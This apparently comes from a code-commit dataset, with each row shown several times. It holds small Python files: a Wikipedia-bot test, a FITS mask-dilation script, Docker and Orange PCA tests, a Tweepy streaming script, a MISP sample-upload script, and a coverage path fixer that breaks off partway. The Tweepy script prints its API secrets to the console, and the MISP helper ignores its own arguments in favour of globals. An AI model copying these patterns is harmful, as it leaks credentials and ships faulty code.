{'content': "foo", 'type': "private", 'sender_email': "foo"},
'For search term "foo", https://en.wikipedia.org/wiki/Foobar'
)
self.assert_bot_output(
{'content': "", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'Please enter your message after @mention-bot'
)
self.assert_bot_output(
{'content': "sssssss kkkkk", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'I am sorry. The search term you provided is not found :slightly_frowning_face:'
)
self.assert_bot_output(
{'content': "123", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'For search term "123", https://en.wikipedia.org/wiki/123'
)
|
testsuite: Add tests for wikipedia bot in contrib_bots.
Add test file 'Test_wikipedia.py'.
Since wikipedia links for the same query may differ according
to relevance, this test should eventually be written by mocking HTTP
traffic, but this can work for now.#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
our_dir = os.path.dirname(os.path.abspath(__file__))
# For dev setups, we can find the API in the repo itself.
if os.path.exists(os.path.join(our_dir, '..')):
sys.path.insert(0, '..')
from bots_test_lib import BotTestCase
class TestWikipediaBot(BotTestCase):
bot_name = "wikipedia"
def test_bot(self):
self.assert_bot_output(
{'content': "foo", 'type': "private", 'sender_email': "foo"},
'For search term "foo", https://en.wikipedia.org/wiki/Foobar'
)
self.assert_bot_output(
{'content': "", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'Please enter your message after @mention-bot'
)
self.assert_bot_output(
{'content': "sssssss kkkkk", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'I am sorry. The search term you provided is not found :slightly_frowning_face:'
)
self.assert_bot_output(
{'content': "123", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'For search term "123", https://en.wikipedia.org/wiki/123'
)
|
<commit_before><commit_msg>testsuite: Add tests for wikipedia bot in contrib_bots.
Add test file 'Test_wikipedia.py'.
Since wikipedia links for the same query may differ according
to relevance, this test should eventually be written by mocking HTTP
traffic, but this can work for now.<commit_after>#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
our_dir = os.path.dirname(os.path.abspath(__file__))
# For dev setups, we can find the API in the repo itself.
if os.path.exists(os.path.join(our_dir, '..')):
sys.path.insert(0, '..')
from bots_test_lib import BotTestCase
class TestWikipediaBot(BotTestCase):
bot_name = "wikipedia"
def test_bot(self):
self.assert_bot_output(
{'content': "foo", 'type': "private", 'sender_email': "foo"},
'For search term "foo", https://en.wikipedia.org/wiki/Foobar'
)
self.assert_bot_output(
{'content': "", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'Please enter your message after @mention-bot'
)
self.assert_bot_output(
{'content': "sssssss kkkkk", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'I am sorry. The search term you provided is not found :slightly_frowning_face:'
)
self.assert_bot_output(
{'content': "123", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'For search term "123", https://en.wikipedia.org/wiki/123'
)
|
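The commit message flags that live Wikipedia lookups are unstable. A hedged sketch of the mocking it anticipates, freezing the HTTP layer with the mock library; the response shape and the use of requests are assumptions, not the bot's real internals:
# Sketch: pin the search result so the expected URL is stable.
# Assumes the bot fetches results via requests.get(...).json().
import mock      # Python 2 backport; unittest.mock on Python 3
import requests
canned = mock.Mock()
canned.json.return_value = {'query': {'search': [{'title': 'Foobar'}]}}
with mock.patch.object(requests, 'get', return_value=canned):
    data = requests.get('https://en.wikipedia.org/w/api.php').json()
    assert data['query']['search'][0]['title'] == 'Foobar'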
|
a4a5dd1943b074cf23cd5420ca0a5ac56fadbc38
|
14B-088/HI/alter_clean_mask.py
|
14B-088/HI/alter_clean_mask.py
|
'''
Dilate the existing clean mask.
'''
from astropy.io import fits
from skimage.morphology import disk
from scipy import ndimage as nd
mask = fits.open("M33_14B-088_HI_mask_modified.fits", mode='update')
pbcov = fits.getdata("M33_14B-088_pbcor.fits")
pb_thresh = 0.2
pb_mask = pbcov > pb_thresh
struct = disk(100)
for i in xrange(1231):
print(i)
mask[0].data[i, 0, :, :] = \
nd.binary_dilation(mask[0].data[i, 0, :, :], structure=struct)
mask[0].data[i, 0, :, :] *= pb_mask.squeeze()
mask.flush()
mask.close()
|
Mask dilation to include missing flux near some edges
|
Mask dilation to include missing flux near some edges
|
Python
|
mit
|
e-koch/VLA_Lband,e-koch/VLA_Lband
|
Mask dilation to include missing flux near some edges
|
'''
Dilate the existing clean mask.
'''
from astropy.io import fits
from skimage.morphology import disk
from scipy import ndimage as nd
mask = fits.open("M33_14B-088_HI_mask_modified.fits", mode='update')
pbcov = fits.getdata("M33_14B-088_pbcor.fits")
pb_thresh = 0.2
pb_mask = pbcov > pb_thresh
struct = disk(100)
for i in xrange(1231):
print(i)
mask[0].data[i, 0, :, :] = \
nd.binary_dilation(mask[0].data[i, 0, :, :], structure=struct)
mask[0].data[i, 0, :, :] *= pb_mask.squeeze()
mask.flush()
mask.close()
|
<commit_before><commit_msg>Mask dilation to include missing flux near some edges<commit_after>
|
'''
Dilate the existing clean mask.
'''
from astropy.io import fits
from skimage.morphology import disk
from scipy import ndimage as nd
mask = fits.open("M33_14B-088_HI_mask_modified.fits", mode='update')
pbcov = fits.getdata("M33_14B-088_pbcor.fits")
pb_thresh = 0.2
pb_mask = pbcov > pb_thresh
struct = disk(100)
for i in xrange(1231):
print(i)
mask[0].data[i, 0, :, :] = \
nd.binary_dilation(mask[0].data[i, 0, :, :], structure=struct)
mask[0].data[i, 0, :, :] *= pb_mask.squeeze()
mask.flush()
mask.close()
|
Mask dilation to include missing flux near some edges
'''
Dilate the existing clean mask.
'''
from astropy.io import fits
from skimage.morphology import disk
from scipy import ndimage as nd
mask = fits.open("M33_14B-088_HI_mask_modified.fits", mode='update')
pbcov = fits.getdata("M33_14B-088_pbcor.fits")
pb_thresh = 0.2
pb_mask = pbcov > pb_thresh
struct = disk(100)
for i in xrange(1231):
print(i)
mask[0].data[i, 0, :, :] = \
nd.binary_dilation(mask[0].data[i, 0, :, :], structure=struct)
mask[0].data[i, 0, :, :] *= pb_mask.squeeze()
mask.flush()
mask.close()
|
<commit_before><commit_msg>Mask dilation to include missing flux near some edges<commit_after>
'''
Dilate the existing clean mask.
'''
from astropy.io import fits
from skimage.morphology import disk
from scipy import ndimage as nd
mask = fits.open("M33_14B-088_HI_mask_modified.fits", mode='update')
pbcov = fits.getdata("M33_14B-088_pbcor.fits")
pb_thresh = 0.2
pb_mask = pbcov > pb_thresh
struct = disk(100)
for i in xrange(1231):
print(i)
mask[0].data[i, 0, :, :] = \
nd.binary_dilation(mask[0].data[i, 0, :, :], structure=struct)
mask[0].data[i, 0, :, :] *= pb_mask.squeeze()
mask.flush()
mask.close()
|
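Per spectral channel, the loop above is plain morphological dilation. A toy, self-contained example of the same operation, using disk(1) instead of the 100-pixel disk:
# Toy illustration of the per-channel dilation used above.
import numpy as np
from scipy import ndimage as nd
from skimage.morphology import disk
m = np.zeros((7, 7), dtype=bool)
m[3, 3] = True  # a single masked pixel
grown = nd.binary_dilation(m, structure=disk(1))
print(grown.sum())  # 5: the pixel plus its four neighbours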
|
67ecc5e673b516de7d438f9294eac43203f6461f
|
sip/execution_control/docker_api/docker_client/tests/test_pcube.py
|
sip/execution_control/docker_api/docker_client/tests/test_pcube.py
|
# -*- coding: utf-8 -*-
"""Test for docker client API on P3."""
import logging
import os
from ..docker_client import DockerClient
logging.basicConfig(level=os.getenv('SIP_DOCKER_API_LOG_LEVEL', 'DEBUG'))
DC = DockerClient()
FILE_PATH = os.path.dirname(__file__)
def test_log_driver():
"""Test function to check if log driver is loaded correctly from
compose file.
"""
config_path = os.path.join(FILE_PATH, '..', 'compose-file',
'docker-compose.p3-fluentd.yml')
running_service_ids = []
test_ids = []
with open(config_path, 'r') as compose_str:
s_ids = DC.create_services(compose_str)
# TODO (NJT) Need to complete this unit test:
# get service details and read the log driver and log options from them
# for s_id in s_ids:
# running_service_ids.append(s_id)
# test_ids.append(s_id)
|
Test script for docker swarm api on p3
|
Test script for docker swarm api on p3
|
Python
|
bsd-3-clause
|
SKA-ScienceDataProcessor/integration-prototype,SKA-ScienceDataProcessor/integration-prototype,SKA-ScienceDataProcessor/integration-prototype,SKA-ScienceDataProcessor/integration-prototype
|
Test script for docker swarm api on p3
|
# -*- coding: utf-8 -*-
"""Test for docker client API on P3."""
import logging
import os
from ..docker_client import DockerClient
logging.basicConfig(level=os.getenv('SIP_DOCKER_API_LOG_LEVEL', 'DEBUG'))
DC = DockerClient()
FILE_PATH = os.path.dirname(__file__)
def test_log_driver():
"""Test function to check if log driver is loaded correctly from
compose file.
"""
config_path = os.path.join(FILE_PATH, '..', 'compose-file',
'docker-compose.p3-fluentd.yml')
running_service_ids = []
test_ids = []
with open(config_path, 'r') as compose_str:
s_ids = DC.create_services(compose_str)
# TODO (NJT) Need to complete this unit test:
# get service details and read the log driver and log options from them
# for s_id in s_ids:
# running_service_ids.append(s_id)
# test_ids.append(s_id)
|
<commit_before><commit_msg>Test script for docker swarm api on p3<commit_after>
|
# -*- coding: utf-8 -*-
"""Test for docker client API on P3."""
import logging
import os
from ..docker_client import DockerClient
logging.basicConfig(level=os.getenv('SIP_DOCKER_API_LOG_LEVEL', 'DEBUG'))
DC = DockerClient()
FILE_PATH = os.path.dirname(__file__)
def test_log_driver():
"""Test function to check if log driver is loaded correctly from
compose file.
"""
config_path = os.path.join(FILE_PATH, '..', 'compose-file',
'docker-compose.p3-fluentd.yml')
running_service_ids = []
test_ids = []
with open(config_path, 'r') as compose_str:
s_ids = DC.create_services(compose_str)
# TODO (NJT) Need to complete this unit test:
# get service details and read the log driver and log options from them
# for s_id in s_ids:
# running_service_ids.append(s_id)
# test_ids.append(s_id)
|
Test script for docker swarm api on p3# -*- coding: utf-8 -*-
"""Test for docker client API on P3."""
import logging
import os
from ..docker_client import DockerClient
logging.basicConfig(level=os.getenv('SIP_DOCKER_API_LOG_LEVEL', 'DEBUG'))
DC = DockerClient()
FILE_PATH = os.path.dirname(__file__)
def test_log_driver():
"""Test function to check if log driver is loaded correctly from
compose file.
"""
config_path = os.path.join(FILE_PATH, '..', 'compose-file',
'docker-compose.p3-fluentd.yml')
running_service_ids = []
test_ids = []
with open(config_path, 'r') as compose_str:
s_ids = DC.create_services(compose_str)
# TODO (NJT) Need to complete this unit test:
# get service details and read the log driver and log options from them
# for s_id in s_ids:
# running_service_ids.append(s_id)
# test_ids.append(s_id)
|
<commit_before><commit_msg>Test script for docker swarm api on p3<commit_after># -*- coding: utf-8 -*-
"""Test for docker client API on P3."""
import logging
import os
from ..docker_client import DockerClient
logging.basicConfig(level=os.getenv('SIP_DOCKER_API_LOG_LEVEL', 'DEBUG'))
DC = DockerClient()
FILE_PATH = os.path.dirname(__file__)
def test_log_driver():
"""Test function to check if log driver is loaded correctly from
compose file.
"""
config_path = os.path.join(FILE_PATH, '..', 'compose-file',
'docker-compose.p3-fluentd.yml')
running_service_ids = []
test_ids = []
with open(config_path, 'r') as compose_str:
s_ids = DC.create_services(compose_str)
# TODO (NJT) Need to complete this unit test:
# get service details and read the log driver and log options from them
# for s_id in s_ids:
# running_service_ids.append(s_id)
# test_ids.append(s_id)
|
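To finish the TODO above, the log driver can be read back from each swarm service's spec. A sketch against docker-py directly; the attribute path follows the Docker service-spec schema, and create_services is assumed to return the new service IDs:
# Hedged sketch of the missing assertion: read each service's log driver
# back out of its swarm spec with docker-py.
import docker
def log_driver_names(service_ids):
    client = docker.from_env()
    for s_id in service_ids:
        spec = client.services.get(s_id).attrs['Spec']
        yield spec['TaskTemplate'].get('LogDriver', {}).get('Name')
The test could then assert all(name == 'fluentd' for name in log_driver_names(s_ids)).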
|
2bf6679ae64c274f1a228a16fa365daa9bb19ae3
|
twitter_streaming.py
|
twitter_streaming.py
|
# This uses Tweepy, a Python library for accessing the Twitter API:
# http://www.tweepy.org. Install with `pip install tweepy`.
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
with open('twitter_api_key.txt') as fileHandle:
(access_token, access_token_secret, consumer_key, consumer_secret) = \
[item.strip('\n') for item in fileHandle.readlines()]
print access_token
print access_token_secret
print consumer_key
print consumer_secret
keywords = ['python', 'javascript', 'ruby']
# This is a basic listener that prints received tweets to stdout
class StdOutListener(StreamListener):
def on_data(self, data):
print data
return True
def on_error(self, status):
print status
if __name__ == "__main__":
# Handle Twitter authentication and connection to Twitter Streaming API
listener = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
# Filter Twitter stream according to keywords
stream.filter(track = keywords)
|
Add main Twitter stream capture script
|
Add main Twitter stream capture script
|
Python
|
mit
|
0x7df/twitter2pocket
|
Add main Twitter stream capture script
|
# This uses Tweepy, a Python library for accessing the Twitter API:
# http://www.tweepy.org. Install with `pip install tweepy`.
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
with open('twitter_api_key.txt') as fileHandle:
(access_token, access_token_secret, consumer_key, consumer_secret) = \
[item.strip('\n') for item in fileHandle.readlines()]
print access_token
print access_token_secret
print consumer_key
print consumer_secret
keywords = ['python', 'javascript', 'ruby']
# This is a basic listener that prints received tweets to stdout
class StdOutListener(StreamListener):
def on_data(self, data):
print data
return True
def on_error(self, status):
print status
if __name__ == "__main__":
# Handle Twitter authentication and connection to Twitter Streaming API
listener = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
# Filter Twitter stream according to keywords
stream.filter(track = keywords)
|
<commit_before><commit_msg>Add main Twitter stream capture script<commit_after>
|
# This uses Tweepy, a Python library for accessing the Twitter API:
# http://www.tweepy.org. Install with `pip install tweepy`.
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
with open('twitter_api_key.txt') as fileHandle:
(access_token, access_token_secret, consumer_key, consumer_secret) = \
[item.strip('\n') for item in fileHandle.readlines()]
print access_token
print access_token_secret
print consumer_key
print consumer_secret
keywords = ['python', 'javascript', 'ruby']
# This is a basic listener that prints received tweets to stdout
class StdOutListener(StreamListener):
def on_data(self, data):
print data
return True
def on_error(self, status):
print status
if __name__ == "__main__":
# Handle Twitter authentication and connection to Twitter Streaming API
listener = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
# Filter Twitter stream according to keywords
stream.filter(track = keywords)
|
Add main Twitter stream capture script# This uses Tweepy, a Python library for accessing the Twitter API:
# http://www.tweepy.org. Install with `pip install tweepy`.
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
with open('twitter_api_key.txt') as fileHandle:
(access_token, access_token_secret, consumer_key, consumer_secret) = \
[item.strip('\n') for item in fileHandle.readlines()]
print access_token
print access_token_secret
print consumer_key
print consumer_secret
keywords = ['python', 'javascript', 'ruby']
# This is a basic listener that prints received tweets to stdout
class StdOutListener(StreamListener):
def on_data(self, data):
print data
return True
def on_error(self, status):
print status
if __name__ == "__main__":
# Handle Twitter authentication and connection to Twitter Streaming API
listener = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
# Filter Twitter stream according to keywords
stream.filter(track = keywords)
|
<commit_before><commit_msg>Add main Twitter stream capture script<commit_after># This uses Tweepy, a Python library for accessing the Twitter API:
# http://www.tweepy.org. Install with `pip install tweepy`.
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
with open('twitter_api_key.txt') as fileHandle:
(access_token, access_token_secret, consumer_key, consumer_secret) = \
[item.strip('\n') for item in fileHandle.readlines()]
print access_token
print access_token_secret
print consumer_key
print consumer_secret
keywords = ['python', 'javascript', 'ruby']
# This is a basic listener that prints received tweets to stdout
class StdOutListener(StreamListener):
def on_data(self, data):
print data
return True
def on_error(self, status):
print status
if __name__ == "__main__":
# Handle Twitter authentication and connection to Twitter Streaming API
listener = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
# Filter Twitter stream according to keywords
stream.filter(track = keywords)
|
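The script expects twitter_api_key.txt to hold four bare lines in a fixed order. A tiny sketch that writes a placeholder file in that layout; the bracketed values are obviously stand-ins:
# Write a placeholder twitter_api_key.txt in the order the script reads:
# access_token, access_token_secret, consumer_key, consumer_secret.
creds = ['<access_token>', '<access_token_secret>',
         '<consumer_key>', '<consumer_secret>']
with open('twitter_api_key.txt', 'w') as fh:
    fh.write('\n'.join(creds) + '\n')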
|
d3dce2e89c41abb35aac5b54c0ef03481b843e89
|
Orange/tests/sql/test_pca.py
|
Orange/tests/sql/test_pca.py
|
import unittest
from unittest.mock import patch, MagicMock
from Orange.data import DiscreteVariable, Domain
from Orange.data.sql.table import SqlTable
from Orange.projection.pca import RemotePCA
from Orange.tests.sql.base import sql_test, connection_params
@sql_test
class PCATest(unittest.TestCase):
@patch("Orange.projection.pca.save_state", MagicMock())
def test_PCA(self):
table = SqlTable(connection_params(), 'iris',
type_hints=Domain([], DiscreteVariable("iris",
values=['Iris-setosa', 'Iris-virginica',
'Iris-versicolor'])))
for batch_size in (50, 500):
rpca = RemotePCA(table, batch_size, 10)
self.assertEqual(rpca.components_.shape, (4, 4))
if __name__ == '__main__':
unittest.main()
|
Add test for RemotePCA (run locally)
|
Add test for RemotePCA (run locally)
|
Python
|
bsd-2-clause
|
qPCR4vir/orange3,kwikadi/orange3,marinkaz/orange3,qPCR4vir/orange3,cheral/orange3,marinkaz/orange3,marinkaz/orange3,qPCR4vir/orange3,marinkaz/orange3,kwikadi/orange3,kwikadi/orange3,kwikadi/orange3,kwikadi/orange3,marinkaz/orange3,cheral/orange3,qPCR4vir/orange3,qPCR4vir/orange3,cheral/orange3,cheral/orange3,marinkaz/orange3,qPCR4vir/orange3,kwikadi/orange3,cheral/orange3,cheral/orange3
|
Add test for RemotePCA (run locally)
|
import unittest
from unittest.mock import patch, MagicMock
from Orange.data import DiscreteVariable, Domain
from Orange.data.sql.table import SqlTable
from Orange.projection.pca import RemotePCA
from Orange.tests.sql.base import sql_test, connection_params
@sql_test
class PCATest(unittest.TestCase):
@patch("Orange.projection.pca.save_state", MagicMock())
def test_PCA(self):
table = SqlTable(connection_params(), 'iris',
type_hints=Domain([], DiscreteVariable("iris",
values=['Iris-setosa', 'Iris-virginica',
'Iris-versicolor'])))
for batch_size in (50, 500):
rpca = RemotePCA(table, batch_size, 10)
self.assertEqual(rpca.components_.shape, (4, 4))
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add test for RemotePCA (run locally)<commit_after>
|
import unittest
from unittest.mock import patch, MagicMock
from Orange.data import DiscreteVariable, Domain
from Orange.data.sql.table import SqlTable
from Orange.projection.pca import RemotePCA
from Orange.tests.sql.base import sql_test, connection_params
@sql_test
class PCATest(unittest.TestCase):
@patch("Orange.projection.pca.save_state", MagicMock())
def test_PCA(self):
table = SqlTable(connection_params(), 'iris',
type_hints=Domain([], DiscreteVariable("iris",
values=['Iris-setosa', 'Iris-virginica',
'Iris-versicolor'])))
for batch_size in (50, 500):
rpca = RemotePCA(table, batch_size, 10)
self.assertEqual(rpca.components_.shape, (4, 4))
if __name__ == '__main__':
unittest.main()
|
Add test for RemotePCA (run locally)import unittest
from unittest.mock import patch, MagicMock
from Orange.data import DiscreteVariable, Domain
from Orange.data.sql.table import SqlTable
from Orange.projection.pca import RemotePCA
from Orange.tests.sql.base import sql_test, connection_params
@sql_test
class PCATest(unittest.TestCase):
@patch("Orange.projection.pca.save_state", MagicMock())
def test_PCA(self):
table = SqlTable(connection_params(), 'iris',
type_hints=Domain([], DiscreteVariable("iris",
values=['Iris-setosa', 'Iris-virginica',
'Iris-versicolor'])))
for batch_size in (50, 500):
rpca = RemotePCA(table, batch_size, 10)
self.assertEqual(rpca.components_.shape, (4, 4))
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add test for RemotePCA (run locally)<commit_after>import unittest
from unittest.mock import patch, MagicMock
from Orange.data import DiscreteVariable, Domain
from Orange.data.sql.table import SqlTable
from Orange.projection.pca import RemotePCA
from Orange.tests.sql.base import sql_test, connection_params
@sql_test
class PCATest(unittest.TestCase):
@patch("Orange.projection.pca.save_state", MagicMock())
def test_PCA(self):
table = SqlTable(connection_params(), 'iris',
type_hints=Domain([], DiscreteVariable("iris",
values=['Iris-setosa', 'Iris-virginica',
'Iris-versicolor'])))
for batch_size in (50, 500):
rpca = RemotePCA(table, batch_size, 10)
self.assertEqual(rpca.components_.shape, (4, 4))
if __name__ == '__main__':
unittest.main()
|
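The (4, 4) assertion says the projection keeps one component per iris feature. The analogous in-memory check with scikit-learn, for intuition only, not Orange's RemotePCA:
# Intuition check with scikit-learn on data shaped like iris.
import numpy as np
from sklearn.decomposition import PCA
X = np.random.rand(150, 4)  # 150 samples, 4 features
pca = PCA().fit(X)
assert pca.components_.shape == (4, 4)  # (n_components, n_features)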
|
58bfd30a23d68540abd92d4d8c3a32d2636108a4
|
examples/add_attachement.py
|
examples/add_attachement.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import priv
import argparse
import os
import glob
import base64
import json
import time
url = 'https://misppriv.circl.lu'
def init(url, key):
return PyMISP(url, key, True, 'json')
def upload_file(m, eid, path):
curevent = m.get_event(eid)
j = curevent.json()
if j.get("Event"):
with open(path, "rb") as curfile:
j["Event"].update({"data": base64.b64encode(curfile.read())})
j["Event"]["timestamp"] = int(time.time())
out = m.update_event(eid, json.dumps(j))
print out, out.text
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send malware sample to MISP.')
parser.add_argument("-u", "--upload", type=str, required=True, help="File or directory of files to upload.")
parser.add_argument("-e", "--event", type=int, help="Event to update with a sample (if none, create a new event).")
args = parser.parse_args()
misp = init(url, priv)
if os.path.isfile(args.upload):
upload_file(misp, args.event, args.upload)
elif os.path.isdir(args.upload):
for filename in glob.iglob(os.path.join(args.upload + '*')):
upload_file(misp, args.event, filename)
|
Add test script to add attachment to event
|
Add test script to add attachment to event
|
Python
|
bsd-2-clause
|
grolinet/PyMISP,pombredanne/PyMISP,iglocska/PyMISP
|
Add test script to add attachment to event
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import priv
import argparse
import os
import glob
import base64
import json
import time
url = 'https://misppriv.circl.lu'
def init(url, key):
return PyMISP(url, key, True, 'json')
def upload_file(m, eid, path):
curevent = misp.get_event(eid)
j = curevent.json()
if j.get("Event"):
with open(path, "rb") as curfile:
j["Event"].update({"data": base64.b64encode(curfile.read())})
j["Event"]["timestamp"] = int(time.time())
out = misp.update_event(args.event, json.dumps(j))
print out, out.text
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send malware sample to MISP.')
parser.add_argument("-u", "--upload", type=str, required=True, help="File or directory of files to upload.")
parser.add_argument("-e", "--event", type=int, help="Event to update with a sample (if none, create a new event).")
args = parser.parse_args()
misp = init(url, priv)
if os.path.isfile(args.upload):
upload_file(misp, args.event, args.upload)
elif os.path.isdir(args.upload):
for filename in glob.iglob(os.path.join(args.upload + '*')):
upload_file(misp, args.event, filename)
|
<commit_before><commit_msg>Add test script to add attachment to event<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import priv
import argparse
import os
import glob
import base64
import json
import time
url = 'https://misppriv.circl.lu'
def init(url, key):
return PyMISP(url, key, True, 'json')
def upload_file(m, eid, path):
curevent = misp.get_event(eid)
j = curevent.json()
if j.get("Event"):
with open(path, "rb") as curfile:
j["Event"].update({"data": base64.b64encode(curfile.read())})
j["Event"]["timestamp"] = int(time.time())
out = misp.update_event(args.event, json.dumps(j))
print out, out.text
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send malware sample to MISP.')
parser.add_argument("-u", "--upload", type=str, required=True, help="File or directory of files to upload.")
parser.add_argument("-e", "--event", type=int, help="Event to update with a sample (if none, create a new event).")
args = parser.parse_args()
misp = init(url, priv)
if os.path.isfile(args.upload):
upload_file(misp, args.event, args.upload)
elif os.path.isdir(args.upload):
for filename in glob.iglob(os.path.join(args.upload + '*')):
upload_file(misp, args.event, filename)
|
Add test script to add attachment to event#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import priv
import argparse
import os
import glob
import base64
import json
import time
url = 'https://misppriv.circl.lu'
def init(url, key):
return PyMISP(url, key, True, 'json')
def upload_file(m, eid, path):
curevent = misp.get_event(eid)
j = curevent.json()
if j.get("Event"):
with open(path, "rb") as curfile:
j["Event"].update({"data": base64.b64encode(curfile.read())})
j["Event"]["timestamp"] = int(time.time())
out = misp.update_event(args.event, json.dumps(j))
print out, out.text
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send malware sample to MISP.')
parser.add_argument("-u", "--upload", type=str, required=True, help="File or directory of files to upload.")
parser.add_argument("-e", "--event", type=int, help="Event to update with a sample (if none, create a new event).")
args = parser.parse_args()
misp = init(url, priv)
if os.path.isfile(args.upload):
upload_file(misp, args.event, args.upload)
elif os.path.isdir(args.upload):
for filename in glob.iglob(os.path.join(args.upload + '*')):
upload_file(misp, args.event, filename)
|
<commit_before><commit_msg>Add test script to add attachment to event<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import priv
import argparse
import os
import glob
import base64
import json
import time
url = 'https://misppriv.circl.lu'
def init(url, key):
return PyMISP(url, key, True, 'json')
def upload_file(m, eid, path):
curevent = misp.get_event(eid)
j = curevent.json()
if j.get("Event"):
with open(path, "rb") as curfile:
j["Event"].update({"data": base64.b64encode(curfile.read())})
j["Event"]["timestamp"] = int(time.time())
out = misp.update_event(args.event, json.dumps(j))
print out, out.text
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send malware sample to MISP.')
parser.add_argument("-u", "--upload", type=str, required=True, help="File or directory of files to upload.")
parser.add_argument("-e", "--event", type=int, help="Event to update with a sample (if none, create a new event).")
args = parser.parse_args()
misp = init(url, priv)
if os.path.isfile(args.upload):
upload_file(misp, args.event, args.upload)
elif os.path.isdir(args.upload):
for filename in glob.iglob(os.path.join(args.upload + '*')):
upload_file(misp, args.event, filename)
|
|
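One caveat about the helper in the record above: upload_file(m, eid, path) never uses its m and eid parameters and reaches for the globals misp and args.event instead, so it only works when called with exactly those objects. A hedged sketch of the presumably intended version, as a drop-in replacement relying on the imports already in the script (the PyMISP method names are copied verbatim from the snippet, not verified against any particular PyMISP release):

def upload_file(m, eid, path):
    curevent = m.get_event(eid)
    j = curevent.json()
    if j.get("Event"):
        with open(path, "rb") as curfile:
            j["Event"].update({"data": base64.b64encode(curfile.read())})
        j["Event"]["timestamp"] = int(time.time())
        out = m.update_event(eid, json.dumps(j))
        print out, out.text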
2f3a60f9163dc99b2329effe256a587e50027993
|
dev_tools/src/d1_dev/pycharm-fix-coverage-paths.py
|
dev_tools/src/d1_dev/pycharm-fix-coverage-paths.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyCharm can't resolve the relative paths written by pytest's coverage plugin.
This converts them to absolute, which PyCharm handles.
"""
import logging
import os
import xml.etree.ElementTree
import d1_dev.util
import d1_common.type_conversions
import d1_common.util
import d1_common.xml
def main():
d1_common.util.log_setup()
repo_root_path = d1_dev.util.find_repo_root()
logging.info('Repository: {}'.format(repo_root_path))
cov_xml_path = os.path.join(repo_root_path, 'coverage.xml')
fixed_cov_xml_path = os.path.join(repo_root_path, 'fixed_coverage.xml')
with open(cov_xml_path, 'rb') as f:
cov_tree = d1_common.type_conversions.str_to_etree(f.read())
filename_el_list = cov_tree.findall('.//*[@filename]')
for filename_el in filename_el_list:
filename_el.attrib['filename'] = os.path.join(
repo_root_path, filename_el.attrib['filename']
)
fixed_cov_xml = xml.etree.ElementTree.tostring(cov_tree, 'utf-8')
with open(fixed_cov_xml_path, 'wb') as f:
f.write(d1_common.xml.pretty_xml(fixed_cov_xml))
if __name__ == '__main__':
main()
|
Add script that fixes paths in coverage.xml for use in PyCharm
|
Add script that fixes paths in coverage.xml for use in PyCharm
|
Python
|
apache-2.0
|
DataONEorg/d1_python,DataONEorg/d1_python,DataONEorg/d1_python,DataONEorg/d1_python
|
Add script that fixes paths in coverage.xml for use in PyCharm
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyCharm can't resolve the relative paths written by pytest's coverage plugin.
This converts them to absolute, which PyCharm handles.
"""
import logging
import os
import xml.etree.ElementTree
import d1_dev.util
import d1_common.type_conversions
import d1_common.util
import d1_common.xml
def main():
d1_common.util.log_setup()
repo_root_path = d1_dev.util.find_repo_root()
logging.info('Repository: {}'.format(repo_root_path))
cov_xml_path = os.path.join(repo_root_path, 'coverage.xml')
fixed_cov_xml_path = os.path.join(repo_root_path, 'fixed_coverage.xml')
with open(cov_xml_path, 'rb') as f:
cov_tree = d1_common.type_conversions.str_to_etree(f.read())
filename_el_list = cov_tree.findall('.//*[@filename]')
for filename_el in filename_el_list:
filename_el.attrib['filename'] = os.path.join(
repo_root_path, filename_el.attrib['filename']
)
fixed_cov_xml = xml.etree.ElementTree.tostring(cov_tree, 'utf-8')
with open(fixed_cov_xml_path, 'wb') as f:
f.write(d1_common.xml.pretty_xml(fixed_cov_xml))
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add script that fixes paths in coverage.xml for use in PyCharm<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyCharm can't resolve the relative paths written by pytest's coverage plugin.
This converts them to absolute, which PyCharm handles.
"""
import logging
import os
import xml.etree.ElementTree
import d1_dev.util
import d1_common.type_conversions
import d1_common.util
import d1_common.xml
def main():
